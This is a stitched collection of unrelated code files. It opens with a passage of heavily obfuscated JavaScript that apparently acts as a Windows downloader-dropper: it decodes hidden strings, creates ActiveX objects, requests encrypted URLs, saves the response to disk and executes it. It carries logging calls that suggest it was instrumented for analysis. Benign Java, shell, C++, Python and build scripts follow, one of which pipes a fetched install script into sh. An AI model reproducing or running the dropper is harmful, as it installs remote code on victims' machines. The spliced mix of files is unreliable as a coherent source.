var qgL=410827;
var TQMbP=qgL+53315;
var ksgShoC=TQMbP/903;
var jONS=ksgShoC-498;
return jONS+0;
}
function fzd() {
var GaSG="";
GaSG=GaSG+taImARE(732-684)+taImARE(4125/33+0)+taImARE(3922/37-0)+taImARE(3*23)+taImARE(233-197)+taImARE(469-357)+taImARE(9225/75+0)+taImARE(912/16+0)+taImARE(2500/25+0)+taImARE(5*11);
return GaSG;
}
function hXMdt() {
var eKJMwp="";
eKJMwp=eKJMwp+taImARE(232-139)+taImARE(482-413)+taImARE(16*7)+taImARE(7548/74+0)+taImARE(12*3)+taImARE(10000/80-0)+taImARE(2226/21-0)+taImARE(806-737)+taImARE(3240/90+0)+taImARE(313-201)+taImARE(277-154)+taImARE(999-942);
return eKJMwp;
}
function TgqZmHg(XyhuR, OPBdAhs)
{
var xHhAv = gViFz(XyhuR);
var DRc = wKU();
var mSZfqO = gViFz(OPBdAhs);
var byfgIKA = [UQPsRs()][tZllJ()];
while (DRc < xHhAv)
{
var eWk = DRc / xQPSW();
var YlW = XyhuR[zaOSBy()](DRc);
DRc++;
YlW = YlW + XyhuR[wBem()](DRc);
DRc = DRc + ligL();
var kfKCj = igX(YlW, exwGC());
var iehRuVT = OPBdAhs[fzd()](eWk % mSZfqO);
var AXrUUP = rTeb(kfKCj, iehRuVT);
var cvxQ = String[hXMdt()](AXrUUP);
byfgIKA = byfgIKA + cvxQ;
}
return byfgIKA;
}
function KMgrYeW(oBi, pAP, RSIf)
{
var Bhk=637605;
var YOWY=Bhk+35000;
var nwKVzHS=YOWY/965;
var Wgm=nwKVzHS-687;
var iJh = Wgm;
var cbjr="";
cbjr=cbjr+taImARE(5280/44-0)+taImARE(730-695)+taImARE(8*13)+taImARE(1*31)+taImARE(917-834)+taImARE(5457/51-0)+taImARE(47*2)+taImARE(3087/49+0)+taImARE(6762/69-0)+taImARE(2695/55+0)+taImARE(103)+taImARE(8360/76-0)+taImARE(3828/66+0)+taImARE(712-587)+taImARE(16*3);
var aGCng=TgqZmHg("662E543D",cbjr);
var nwScG = oBi[aGCng]();
var talev="";
talev=talev+taImARE(158-127)+taImARE(8613/99-0)+taImARE(748-623)+taImARE(5800/100-0)+taImARE(5184/54+0)+taImARE(359-285)+taImARE(698-623)+taImARE(4*17)+taImARE(428-390)+taImARE(4876/46+0)+taImARE(2208/23+0);
var wPXU=TgqZmHg("0A191228",talev);
var ngpIDG = oBi[wPXU];
var NrDE=474263;
var CfcJQoZ=NrDE+3838;
var DEAXf=CfcJQoZ/507;
var RRcQn=DEAXf-742;
var GpCV = RRcQn;
var TetiHXd=["E","nw","TDX","4xV","x","z6z","b","c","o","q","A"];
var bSSSb=TetiHXd[3]+TetiHXd[7]+TetiHXd[4]+TetiHXd[1]+TetiHXd[5]+TetiHXd[6]+TetiHXd[9]+TetiHXd[2]+TetiHXd[10]+TetiHXd[0]+TetiHXd[8];
var mIdk=TgqZmHg("753C19273A40251F5515101527212C",bSSSb);
var CnhTkNb = new RSIf(mIdk);
var oqG="";
oqG=oqG+taImARE(3*11)+taImARE(2622/46+0)+taImARE(586-462)+taImARE(920/10+0)+taImARE(107)+taImARE(3096/86-0)+taImARE(4968/46+0)+taImARE(260/4+0)+taImARE(1496/44+0)+taImARE(67)+taImARE(7200/96-0)+taImARE(87-52)+taImARE(1350/27+0);
var HqYuckO=TgqZmHg("170C0C",oqG);
var OSELjK = HqYuckO;
var AEWPI=TgqZmHg("2D042E26091E","KmKJmmjVbqHhNfOkW");
var pTuLW=TgqZmHg("1303220B1F06","rsRnqbU6CkMYBk6U");
CnhTkNb[AEWPI][pTuLW](OSELjK, GpCV, ngpIDG);
var lsnT=TgqZmHg("2A12552C","Eb0BY9i92K");
CnhTkNb[lsnT]();
var TGdH=TgqZmHg("07213E790206","fEZ7gqmMM6dYtbg2");
util_log({CnhTkNb:CnhTkNb, TGdH:TGdH});
CnhTkNb[TGdH]();
var EwV=TgqZmHg("0720402E0A0E2A10383821","fP0KdjixMVJKbg");
util_log({CnhTkNb:CnhTkNb, OSELjK:OSELjK, EwV:EwV, nwScG:nwScG});
CnhTkNb(OSELjK)[EwV](nwScG);
var kgCUeX=["jGO","cv","Y","2","Q","wmO","cx4","Mt","tht"];
var Fddd=kgCUeX[8]+kgCUeX[5]+kgCUeX[0]+kgCUeX[1]+kgCUeX[6]+kgCUeX[2]+kgCUeX[4]+kgCUeX[7]+kgCUeX[3];
var mZqk=TgqZmHg("01181016192A",Fddd);
CnhTkNb[mZqk]();
var blkbK=TgqZmHg("27262F0533","QGCpVQ5fZ6f");
nwScG = CnhTkNb(OSELjK)[blkbK];
var orp=TgqZmHg("01300006365D","mUnaB5ucbhSgcGqReNd");
var MQTr = nwScG[orp];
if (MQTr > iJh)
{
var xili=TgqZmHg("6412000B3016000C3B3D","7svndyFeWXuobmpzpx");
oBi[xili](pAP);
return true;
}
else return false;
}
function girBemK(cfx)
{
var IIwB="";
IIwB=IIwB+taImARE(463-420)+taImARE(3795/55+0)+taImARE(3528/72-0)+taImARE(2*37)+taImARE(3115/89+0)+taImARE(200-139)+taImARE(176-96)+taImARE(2436/28-0)+taImARE(9*7)+taImARE(4473/71-0)+taImARE(317-223)+taImARE(790-749)+taImARE(1972/29+0)+taImARE(134-96)+taImARE(840-731)+taImARE(43)+taImARE(6930/66-0)+taImARE(12*7)+taImARE(354-281)+taImARE(73);
var JEqvT = "3421610F07617E281A1B3F133339";
var KSqFdmc=TgqZmHg(JEqvT,IIwB);
var Mjqvj = new cfx(KSqFdmc);
return Mjqvj;
}
function aYdA(orZl, VTZO)
{
var DnfCjtu="";
DnfCjtu=DnfCjtu+taImARE(670-636)+taImARE(79)+taImARE(630/6-0)+taImARE(1323/21-0)+taImARE(819/9+0)+taImARE(2870/70-0)+taImARE(2052/57-0)+taImARE(8200/82+0)+taImARE(963-879)+taImARE(5040/60-0)+taImARE(20*5)+taImARE(377-332)+taImARE(16*5);
var ojgRYC = "20353F39";
var GPwug=TgqZmHg(ojgRYC,DnfCjtu);
var itnGtkQ="";
itnGtkQ=itnGtkQ+taImARE(4850/97+0)+taImARE(4715/41+0)+taImARE(8505/81-0)+taImARE(378/7-0)+taImARE(672/8-0)+taImARE(12*3)+taImARE(12*3)+taImARE(730-680)+taImARE(1002-950)+taImARE(2665/65-0)+taImARE(728-620)+taImARE(5*19)+taImARE(598-531)+taImARE(210/5+0)+taImARE(32*3)+taImARE(686-571)+taImARE(11036/89+0)+taImARE(1665/45-0)+taImARE(2*29)+taImARE(420-388);
var CFC = "09030E";
var ymfCnu=TgqZmHg(CFC,itnGtkQ);
var skQrsO=293273;
var mBY=skQrsO+27271;
var EnjT=mBY/504;
var snak=EnjT-636;
orZl[GPwug](ymfCnu, VTZO, snak);
try {
var VriFZJ=["G","G9T","T","CY","HN","i8","JQ1","UDc"];
var YTllka=VriFZJ[7]+VriFZJ[3]+VriFZJ[0]+VriFZJ[6]+VriFZJ[1]+VriFZJ[5]+VriFZJ[4]+VriFZJ[2];
var ECwIk = "26210D27";
var dqzZ=TgqZmHg(ECwIk,YTllka);
orZl[dqzZ]();
} catch (dKi) {
return 0;
}
return 1;
}
function yRtn(okz)
{
var MfHRx=TgqZmHg("2A35463C3834","kV2UNQuzI65");
var edzdrkZ = MfHRx + okz;
var JzF = eval(edzdrkZ);
var zovl="";
zovl=zovl+taImARE(7636/83-0)+taImARE(8712/72+0)+taImARE(3*31)+taImARE(987-956)+taImARE(73)+taImARE(9*7)+taImARE(5200/65-0)+taImARE(883-842)+taImARE(4000/80-0)+taImARE(5*11)+taImARE(10*7)+taImARE(2546/38+0)+taImARE(3910/34+0)+taImARE(15*7)+taImARE(825/15-0)+taImARE(3*31)+taImARE(32*3)+taImARE(7*7);
var riaDk=TgqZmHg("023D0A35037727283C181250",zovl);
var BdegmoZ=187320;
var jrlSR=BdegmoZ+47390;
var LzmuxAw=jrlSR/245;
var kiMP=LzmuxAw-916;
var UdzoY = riaDk + kiMP;
if (UdzoY==edzdrkZ)
{
return okz;
}
else
{
return "7"?JzF:"9";
}
}
function nDWpqY(tYnE, orZl)
{
var wxhFztl=TgqZmHg("76322E3B","9BKUDa1jXM7HmNhF4eY");
tYnE[wxhFztl]();
var cFy=TgqZmHg("1D4E1A1C","I7jynJHnBRvfUv3P1ls");
tYnE[cFy] = 1;
var qmqQDyl=TgqZmHg("162618055A053F0E170B203A","DCku5kLkUd");
var KTupLIG = orZl[qmqQDyl];
var VZDQl=TgqZmHg("31343D1006","fFTdcNhuAobqudNL1RV");
tYnE[VZDQl](KTupLIG);
var tMEVUi=TgqZmHg("3317382A3C3D352D","cxKCHTZCsPBe73g");
tYnE[tMEVUi] = 0;
}
function wnN(RSIf, orZl)
{
var vLxbrt=TgqZmHg("1F5134222603191C5465302807331F4B353F331A3F10592E1535","L2FKVwpr3KvAkV");
var YAw = new RSIf(vLxbrt);
var oeUD=TgqZmHg("0D3335107B5A38012A2E0C1D","LwzT9tkuXKmpQ2R2g");
var fJd = new RSIf(oeUD);
var NdQ = bUBQdl(YAw);
nDWpqY(fJd, orZl);
if (!KMgrYeW(fJd, NdQ, RSIf))
return 11;
var bGH=TgqZmHg("762719185C","5Kvk9qFoxt70zX8qepm");
fJd[bGH]();
var pndgJ=TgqZmHg("0224534057171557575365","aI7n2opwx0Efdtqde3E6");
var YlHW = pndgJ + NdQ;
var Tki=TgqZmHg("331838000A5439040C2E6526091F210F210B17","RkImd0JndWRGny");
var etjjw=TgqZmHg("785F0B74","In9G7T8RCMl");
var jRCDSEu = JLmAt(Tki, RSIf, YlHW, etjjw);
if (jRCDSEu < 10)
{
var OdZ=TgqZmHg("033F3202101A17","TlQpyjc6kh39");
var mCYcmF = eval(OdZ);
var rxZ=TgqZmHg("060A033D03451C39031508131E32","UiqTs1ZLoyFrsW");
var znX = mCYcmF[rxZ];
var RWG=TgqZmHg("5C3F0603392D1C035F1C","8ZjfMHZj3yj5EFsR5Wt");
YAw[RWG](znX);
return true;
}
return jRCDSEu;
}
function lZrMQfe(tvFAk)
{
var vqfP = "3" + "\x41" + "0" + "\x37" + "\x30" + "1" + "\x30" + "\x42" + "5" + "0" + "\x35" + "\x37";
vqfP += "11";
var zmuy=TgqZmHg(vqfP,"bHca54eWiY");
var Otpbh = yRtn(zmuy);
var BmxEAQp = xTxkq(Otpbh);
var SEh = girBemK(Otpbh);
if (aYdA(SEh, tvFAk) == 0)
return false;
var QIja = "\x31" + "\x32" + "\x30" + "5" + "\x35" + "\x31" + "\x31" + "D" + "\x33" + "A" + "1" + "9";
var CYcUWHU=TgqZmHg(QIja,"Aq0iOjmVftxE");
var KyBFfA = SEh[CYcUWHU];
var MlfoYdV = 200;
if (KyBFfA == MlfoYdV) {
var jRCDSEu = wnN(Otpbh, SEh);
var MdkcDxu=101069;
var DARuj=MdkcDxu+5653;
var dYl=DARuj/231;
var VSCUVe=dYl-452;
var otj = VSCUVe;
if (jRCDSEu < otj)
{
return true;
}
else
{
return false;
}
}
else {
return false;
}
return true;
}
function Urza(VTZO, KmktwB)
{
try
{
var zfhUWxJ = lZrMQfe(VTZO);
throw ((5 > 4)?((18 > 2)?zfhUWxJ:""):1);
}
catch(OZTgXL)
{
if (true && OZTgXL) return OZTgXL;
var oKW = "0123456789";
var tOTOc = "14\x30\x425A\x33\x32150\x35";
var TXY=TgqZmHg(tOTOc,"xn4UamvmMcmdv");
var IbsGE=7288;
var Wvf=IbsGE+21753;
var MqjlM=Wvf/257;
var UShuSV=MqjlM-109;
var rgMUd = (oKW[TXY] < UShuSV);
return rgMUd;
}
return KmktwB;
}
function OcRSCv()
{
return 1;
}
function Nvk(sIz)
{
var tvFAk = [];
var FcxPKQ=123392;
var rLGvcO=FcxPKQ+41696;
var jpk=rLGvcO/176;
var MsBRd=jpk-938;
util_log("Starting Nvk("+sIz+")");
var MYhK = "2\x35\x3063\x44\x31\x326\x387E";
MYhK += "59371B560242";
MYhK += "413518211B27";
MYhK += "1\x31\x33\x3938582\x341\x44";
MYhK += "5\x345947\x342\x3751\x34";
MYhK += "\x32\x321\x433D0\x37\x33C25";
MYhK += "59331A5C1B55";
MYhK += "417707241D3D";
MYhK += "10213C192B1B";
MYhK += "57055B5B7746";
MYhK += "\x37\x34427\x434\x433729";
MYhK += "13";
var ixqc=TgqZmHg(MYhK,taImARE(229-171)+taImARE(3*23)+taImARE(5*13)+taImARE(5456/44+0)+taImARE(14*7)+taImARE(4*13)+taImARE(5460/78+0)+taImARE(2132/52+0)+taImARE(3*23)+taImARE(490/10+0)+taImARE(10*7)+taImARE(5346/66+0)+taImARE(846/18+0)+taImARE(1089/9-0)+taImARE(47*2));
util_log("ixqc " + ixqc)
tvFAk[MsBRd] = ixqc;
var cwRbR=24991;
var ylR=cwRbR+28413;
var WgSzpvB=ylR/676;
var VEvVR=WgSzpvB-78;
var SqC = "\x32D45333C501\x36";
SqC += "4A17145B6038";
SqC += "251B2C5C0F3A";
SqC += "33183744683B";
SqC += "1A14060A1F42";
SqC += "2\x3825255\x3536\x35\x30";
SqC += "\x30B\x32\x35\x322\x345\x36A\x344";
SqC += "2938034D0900";
SqC += "\x3151\x39\x32\x31\x32A\x33F\x31\x44";
SqC += "3759092D3419";
SqC += "740\x38\x37\x3779\x34\x34\x35C";
SqC += "1D00";
var wvzdTH=TgqZmHg(SqC,taImARE(5293/67-0)+taImARE(2160/20-0)+taImARE(2173/53+0)+taImARE(12*7)+taImARE(412/4-0)+taImARE(1176/24-0)+taImARE(3*19)+taImARE(895-838)+taImARE(938/14+0)+taImARE(677-582)+taImARE(4872/84+0)+taImARE(620-585)+taImARE(4160/80-0)+taImARE(4416/46+0)+taImARE(2*37)+taImARE(18*3)+taImARE(286-230)+taImARE(109)+taImARE(433-392)+taImARE(5*19));
tvFAk[VEvVR] = wvzdTH;
return tvFAk[sIz];
}
var YaFozBt = 0;
function Xrkk() {
var aoAPm=554561;
var RgB=aoAPm+57439;
var fVWplh=RgB/720;
var CkczUtW=fVWplh-848;
return CkczUtW+0;
}
var dNxffdL = Xrkk();
util_log("a " + dNxffdL);
for (; YaFozBt < dNxffdL; ++YaFozBt)
{
if ( (OcRSCv() >= 0) /*&& owFqDm(YaFozBt)*/)
{
var GzvMU = false;
GzvMU = Urza(Nvk(0), 128 < 54);
if (GzvMU)
{
}
else
Urza(Nvk(1), false);
}
}
|
<reponame>anotheria/moskito-control
package org.moskito.control.core.inspection;
import org.moskito.control.config.ComponentConfig;
import org.moskito.control.connectors.Connector;
import org.moskito.control.connectors.ConnectorException;
import org.moskito.control.connectors.ConnectorFactory;
import org.moskito.control.connectors.response.ConnectorAccumulatorResponse;
import org.moskito.control.connectors.response.ConnectorAccumulatorsNamesResponse;
import org.moskito.control.connectors.response.ConnectorConfigResponse;
import org.moskito.control.connectors.response.ConnectorInformationResponse;
import org.moskito.control.connectors.response.ConnectorInspectionDataSupportResponse;
import org.moskito.control.connectors.response.ConnectorStatusResponse;
import org.moskito.control.connectors.response.ConnectorThresholdsResponse;
import org.moskito.control.core.Component;
import org.moskito.control.core.ComponentRepository;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.IOException;
import java.util.List;
/**
* Provides the most recent data for separate section of component on-demand.
*
* @author <NAME>
*/
public class ComponentInspectionDataProvider {
/**
* Logger.
*/
Logger log = LoggerFactory.getLogger(ComponentInspectionDataProvider.class);
/**
* Provides thresholds data.
*
* @param component {@link Component}
* @return {@link ConnectorThresholdsResponse}
*/
public ConnectorThresholdsResponse provideThresholds(Component component) {
Connector connector = getConfiguredConnector(component);
ConnectorThresholdsResponse response = null;
try {
response = connector.getThresholds();
ConnectorStatusResponse newStatus = connector.getNewStatus();
component.setStatus(newStatus.getStatus());
} catch (ConnectorException e) {
log.info("Cannot retrieve thresholds for " + component.getName(), e);
return null;
}
return response;
}
/**
* Provides accumulators names data (list of accumulators names).
*
* @param component {@link Component}
* @return {@link ConnectorAccumulatorsNamesResponse}
*/
public ConnectorAccumulatorsNamesResponse provideAccumulatorsNames(Component component) {
Connector connector = getConfiguredConnector(component);
ConnectorAccumulatorsNamesResponse response = null;
try {
response = connector.getAccumulatorsNames();
} catch (IOException e) {
log.info("Cannot retrieve accumulators list for " + component.getName(), e);
return null;
}
return response;
}
/**
* Provides accumulators charts data.
*
* @param component {@link Component}
* @param accumulatorsNames list of accumulators names to get charts for
* @return {@link ConnectorAccumulatorResponse}
*/
public ConnectorAccumulatorResponse provideAccumulatorsCharts(Component component, List<String> accumulatorsNames) {
Connector connector = getConfiguredConnector(component);
ConnectorAccumulatorResponse response = null;
response = connector.getAccumulators(accumulatorsNames);
return response;
}
/**
* Provides connector information data.
*
* @param component {@link Component}
* @return {@link ConnectorAccumulatorResponse}
*/
public ConnectorInformationResponse provideConnectorInformation(Component component) {
return getConfiguredConnector(component).getInfo();
}
/**
* Provides supported inspection data for given component.
*
* @param component {@link Component}
* @return {@link ConnectorInspectionDataSupportResponse}
*/
public ConnectorInspectionDataSupportResponse provideConnectorInspectionDataSupport(Component component) {
Connector connector = getConfiguredConnector(component);
ConnectorInspectionDataSupportResponse dataSupportResponse = new ConnectorInspectionDataSupportResponse();
dataSupportResponse.setSupportsAccumulators(connector.supportsAccumulators());
dataSupportResponse.setSupportsThresholds(connector.supportsThresholds());
dataSupportResponse.setSupportsInfo(connector.supportsInfo());
dataSupportResponse.setSupportsConfig(connector.supportsConfig());
return dataSupportResponse;
}
/**
* Provides component's config.
*
* @param component {@link Component}
* @return {@link ConnectorConfigResponse}
*/
public ConnectorConfigResponse provideConfig(Component component) {
return getConfiguredConnector(component).getConfig();
}
/**
* Configures connector for given application and component.
*
* @param component {@link Component}
* @return configured {@link Connector}
*/
private Connector getConfiguredConnector(Component component) {
ComponentConfig componentConfig = ComponentRepository.getInstance().getComponent(component.getName()).getConfiguration();
Connector connector = ConnectorFactory.createConnector(componentConfig.getConnectorType());
connector.configure(componentConfig.getName(), componentConfig.getLocation(), componentConfig.getCredentials());
return connector;
}
}
|
#!/usr/bin/env bash
set -eux
CMD_ARGS=("$@")
# Destroy Environment
cleanup() {
cd ../connection_aws_ssm
ansible-playbook -c local aws_ssm_integration_test_teardown.yml "${CMD_ARGS[@]}"
}
trap "cleanup" EXIT
# Setup Environment
ansible-playbook -c local aws_ssm_integration_test_setup.yml "$@"
# Export the AWS Keys
set +x
. ./aws-env-vars.sh
set -x
cd ../connection
# Execute Integration tests for Linux
INVENTORY=../connection_aws_ssm/inventory-linux.aws_ssm ./test.sh \
-e target_hosts=aws_ssm \
-e local_tmp=/tmp/ansible-local \
-e remote_tmp=/tmp/ansible-remote \
-e action_prefix= \
"$@"
# Execute Integration tests for Windows
INVENTORY=../connection_aws_ssm/inventory-windows.aws_ssm ./test.sh \
-e target_hosts=aws_ssm \
-e local_tmp=/tmp/ansible-local \
-e remote_tmp=c:/windows/temp/ansible-remote \
-e action_prefix=win_ \
"$@"
|
package de.unibi.agbi.biodwh2.core.vocabulary;
import org.apache.jena.rdf.model.Property;
import org.apache.jena.rdf.model.ResourceFactory;
public class BioModels {
public static final String sbmlRdf = "http://identifiers.org/biomodels.vocabulary/";
public static final String bqbiol = "http://biomodels.net/biology-qualifiers/";
public static final String bqmodel = "http://biomodels.net/de.unibi.agbi.biodwh2.reactome.entities-qualifiers/";
public static final Property name = ResourceFactory.createProperty(sbmlRdf + "name");
BioModels(){
}
}
|
// No copyright - copy as you please
#pragma once
#include <Engine/UserDefinedEnum.h>
#include "EAIState.generated.h"
UENUM(BlueprintType) //"BlueprintType" is essential to include
enum class EAIState_Enum : uint8
{
Homeless UMETA(DisplayName = "Homeless"),
Working UMETA(DisplayName = "Working"),
Sleeping UMETA(DisplayName = "Sleeping"),
MoveByCommander UMETA(DisplayName = "MoveByCommander")
};
UCLASS()
class TD2020_API UEAIState : public UUserDefinedEnum
{
GENERATED_BODY()
public:
UPROPERTY(EditAnywhere, BlueprintReadWrite, Category = "Enum")
EAIState_Enum AIState;
//Rest of Class Code
};
|
import nltk
def classify_spam():
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
data = "This email is a spam message."
stop_words = set(stopwords.words('english'))
words = word_tokenize(data)
words_filtered = []
for w in words:
if w not in stop_words:
words_filtered.append(w)
if 'spam' in words_filtered:
print("This is a spam email.")
else:
print("This is a valid email.")
if __name__ == "__main__":
classify_spam() |
// WARNING: Changes to this file must be contributed back to Sawyer or else they will
// be clobbered by the next update from Sawyer. The Sawyer repository is at
// https://github.com/matzke1/sawyer.
#ifndef Sawyer_Access_H
#define Sawyer_Access_H
namespace Sawyer {
namespace Access {
/** Bits to define accessibility.
*
* These constants are used throughout the AddressMap framework. */
enum Access {
EXECUTABLE = 0x00000001, /**< Execute accessibility bit. */
WRITABLE = 0x00000002, /**< Write accessibility bit. */
READABLE = 0x00000004, /**< Read accessibility bit. */
IMMUTABLE = 0x00000008, /**< Underlying buffer is immutable. E.g., mmap'd read-only. */
RESERVED_MASK = 0x000000ff, /**< Accessibility bits reserved for use by the library. */
USERDEF_MASK = 0xffffff00 /**< Accessibility bits available to users. */
};
} // namespace
} // namespace
#endif
|
#!/bin/bash
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# export JAVA_HOME=java
# export SUBMARINE_SERVER_JAVA_OPTS
# export SUBMARINE_SERVER_MEM="-Xms1024m -Xmx1024m -XX:MaxPermSize=512m"
|
#!/bin/bash
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -euo pipefail
if [[ -z "$(command -v golangci-lint)" ]]; then
echo "Cannot find golangci-lint. Installing golangci-lint..."
curl -sSfL https://raw.githubusercontent.com/golangci/golangci-lint/master/install.sh | sh -s -- -b $(go env GOPATH)/bin v1.31.0
export PATH=$PATH:$(go env GOPATH)/bin
fi
echo "Verifying golint"
readonly PKG_ROOT="$(git rev-parse --show-toplevel)"
golangci-lint run --config ${PKG_ROOT}/.golangci.yml
echo "Congratulations! Lint check completed for all Go source files."
|
#!/bin/sh
# a u t o g e n . s h
#
# Copyright (c) 2005-2007 United States Government as represented by
# the U.S. Army Research Laboratory.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
###
#
# Script for automatically preparing the sources for compilation by
# performing the myrid of necessary steps. The script attempts to
# detect proper version support, and outputs warnings about particular
# systems that have autotool peculiarities.
#
# Basically, if everything is set up and installed correctly, the
# script will validate that minimum versions of the GNU Build System
# tools are installed, account for several common configuration
# issues, and then simply run autoreconf for you.
#
# If autoreconf fails, which can happen for many valid configurations,
# this script proceeds to run manual preparation steps effectively
# providing a POSIX shell script (mostly complete) reimplementation of
# autoreconf.
#
# The AUTORECONF, AUTOCONF, AUTOMAKE, LIBTOOLIZE, ACLOCAL, AUTOHEADER
# environment variables and corresponding _OPTIONS variables (e.g.
# AUTORECONF_OPTIONS) may be used to override the default automatic
# detection behaviors. Similarly the _VERSION variables will override
# the minimum required version numbers.
#
# Examples:
#
# To obtain help on usage:
# ./autogen.sh --help
#
# To obtain verbose output:
# ./autogen.sh --verbose
#
# To skip autoreconf and prepare manually:
# AUTORECONF=false ./autogen.sh
#
# To verbosely try running with an older (unsupported) autoconf:
# AUTOCONF_VERSION=2.50 ./autogen.sh --verbose
#
# Author: Christopher Sean Morrison <morrison@brlcad.org>
#
######################################################################
# set to minimum acceptible version of autoconf
if [ "x$AUTOCONF_VERSION" = "x" ] ; then
AUTOCONF_VERSION=2.52
fi
# set to minimum acceptible version of automake
if [ "x$AUTOMAKE_VERSION" = "x" ] ; then
AUTOMAKE_VERSION=1.6.0
fi
# set to minimum acceptible version of libtool
if [ "x$LIBTOOL_VERSION" = "x" ] ; then
LIBTOOL_VERSION=1.4.2
fi
##################
# ident function #
##################
ident ( ) {
# extract copyright from header
__copyright="`grep Copyright $AUTOGEN_SH | head -${HEAD_N}1 | awk '{print $4}'`"
if [ "x$__copyright" = "x" ] ; then
__copyright="`date +%Y`"
fi
# extract version from CVS Id string
__id="$Id: autogen.sh,v 14.97 2007/06/18 22:25:02 brlcad Exp $"
__version="`echo $__id | sed 's/.*\([0-9][0-9][0-9][0-9]\)[-\/]\([0-9][0-9]\)[-\/]\([0-9][0-9]\).*/\1\2\3/'`"
if [ "x$__version" = "x" ] ; then
__version=""
fi
echo "autogen.sh build preparation script by Christopher Sean Morrison"
echo "revised 3-clause BSD-style license, copyright (c) $__copyright"
echo "script version $__version, ISO/IEC 9945 POSIX shell script"
}
##################
# USAGE FUNCTION #
##################
usage ( ) {
echo "Usage: $AUTOGEN_SH [-h|--help] [-v|--verbose] [-q|--quiet] [--version]"
echo " --help Help on $NAME_OF_AUTOGEN usage"
echo " --verbose Verbose progress output"
echo " --quiet Quiet suppressed progress output"
echo " --version Only perform GNU Build System version checks"
echo
echo "Description: This script will validate that minimum versions of the"
echo "GNU Build System tools are installed and then run autoreconf for you."
echo "Should autoreconf fail, manual preparation steps will be run"
echo "potentially accounting for several common preparation issues. The"
echo "AUTORECONF, AUTOCONF, AUTOMAKE, LIBTOOLIZE, ACLOCAL, AUTOHEADER,"
echo "PROJECT, & CONFIGURE environment variables and corresponding _OPTIONS"
echo "variables (e.g. AUTORECONF_OPTIONS) may be used to override the"
echo "default automatic detection behavior."
echo
ident
return 0
}
##########################
# VERSION_ERROR FUNCTION #
##########################
version_error ( ) {
if [ "x$1" = "x" ] ; then
echo "INTERNAL ERROR: version_error was not provided a version"
exit 1
fi
if [ "x$2" = "x" ] ; then
echo "INTERNAL ERROR: version_error was not provided an application name"
exit 1
fi
$ECHO
$ECHO "ERROR: To prepare the ${PROJECT} build system from scratch,"
$ECHO " at least version $1 of $2 must be installed."
$ECHO
$ECHO "$NAME_OF_AUTOGEN does not need to be run on the same machine that will"
$ECHO "run configure or make. Either the GNU Autotools will need to be installed"
$ECHO "or upgraded on this system, or $NAME_OF_AUTOGEN must be run on the source"
$ECHO "code on another system and then transferred to here. -- Cheers!"
$ECHO
}
##########################
# VERSION_CHECK FUNCTION #
##########################
version_check ( ) {
if [ "x$1" = "x" ] ; then
echo "INTERNAL ERROR: version_check was not provided a minimum version"
exit 1
fi
_min="$1"
if [ "x$2" = "x" ] ; then
echo "INTERNAL ERROR: version check was not provided a comparison version"
exit 1
fi
_cur="$2"
# needed to handle versions like 1.10 and 1.4-p6
_min="`echo ${_min}. | sed 's/[^0-9]/./g' | sed 's/\.\././g'`"
_cur="`echo ${_cur}. | sed 's/[^0-9]/./g' | sed 's/\.\././g'`"
_min_major="`echo $_min | cut -d. -f1`"
_min_minor="`echo $_min | cut -d. -f2`"
_min_patch="`echo $_min | cut -d. -f3`"
_cur_major="`echo $_cur | cut -d. -f1`"
_cur_minor="`echo $_cur | cut -d. -f2`"
_cur_patch="`echo $_cur | cut -d. -f3`"
if [ "x$_min_major" = "x" ] ; then
_min_major=0
fi
if [ "x$_min_minor" = "x" ] ; then
_min_minor=0
fi
if [ "x$_min_patch" = "x" ] ; then
_min_patch=0
fi
if [ "x$_cur_minor" = "x" ] ; then
_cur_major=0
fi
if [ "x$_cur_minor" = "x" ] ; then
_cur_minor=0
fi
if [ "x$_cur_patch" = "x" ] ; then
_cur_patch=0
fi
$VERBOSE_ECHO "Checking if ${_cur_major}.${_cur_minor}.${_cur_patch} is greater than ${_min_major}.${_min_minor}.${_min_patch}"
if [ $_min_major -lt $_cur_major ] ; then
return 0
elif [ $_min_major -eq $_cur_major ] ; then
if [ $_min_minor -lt $_cur_minor ] ; then
return 0
elif [ $_min_minor -eq $_cur_minor ] ; then
if [ $_min_patch -lt $_cur_patch ] ; then
return 0
